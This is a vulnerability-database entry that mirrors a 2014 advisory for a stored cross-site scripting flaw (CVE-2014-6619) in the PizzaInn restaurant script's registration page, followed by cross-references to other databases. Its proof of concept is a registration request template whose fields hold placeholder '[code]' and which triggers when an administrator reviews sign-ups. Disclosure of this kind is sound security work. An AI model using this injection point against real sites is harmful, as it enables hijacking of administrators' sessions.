Lucene search
Kenneth F. BelvaEXPLOITPACK:AEB466E20BC3AE568F7CB95839AE1C18HistorySep 24, 2014 - 12:00 a.m.
Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting
2014-09-2400:00:00
Kenneth F. Belva
5
0.002 Low
EPSS
Percentile
60.9%
Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting
Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
Proof of Concept :
==================
http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=RegisterRelated
cvelist
cvelist
CVE-2014-6619
2014-09-30 16:00:00
cve
cve
CVE-2014-6619
2014-09-30 16:55:07
seebug
seebug
Restaurant Script (PizzaInn Project) - Stored XSS
2014-09-29 00:00:00
prion
prion
Cross site scripting
2014-09-30 16:55:00
packetstorm
packetstorm
Pizza Inn Registration Cross Site Scripting
2014-09-21 00:00:00
nvd
nvd
CVE-2014-6619
2014-09-30 16:55:07
exploitdb
exploitdb
Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting
2014-09-24 00:00:00